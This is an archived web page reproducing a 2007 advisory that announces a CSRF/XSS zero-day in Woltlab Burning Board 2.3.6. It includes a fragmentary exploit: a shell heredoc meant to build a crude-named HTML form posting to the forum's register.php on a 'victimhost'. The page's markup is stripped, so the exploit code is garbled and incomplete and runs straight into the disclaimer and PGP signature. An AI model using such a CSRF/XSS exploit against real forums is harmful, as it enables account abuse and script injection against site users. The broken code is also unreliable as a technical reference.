Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: c07-2514.htm

Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day



Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- -  -- -
| SaMuschie Research Labs proudly presents . . .
+-------------------------------------------  -- -  -  
| Application: Woltlab Burning Board (wbb)
| Version: 2.3.6 (others not testet)
| Vuln./Exploit Type: CSRF/XSS
| Status: 0day
+----------------------------------------- --  -  -  
| Discovered by: Samenspender
| Released: 20070302
| SaMuschie Release Number: 5
+------------------------------- -  -- -

CSRF/XSS Exploit:

cat < wetpussy.html
action='http://victimhost/wbb2/register.php'>
EOF +----------------------------- -- - | Lameness Disclaimer +------------------------------------- - -- - - | SaMuschie Research Labs was founded to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) +---------------------------------- - -- - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD Qg6at+bMTnvHbw0SYyXk5ko=7wPg -----END PGP SIGNATURE----- =09 =09 ___________________________________________________________ Der fr=FChe Vogel f=E4ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH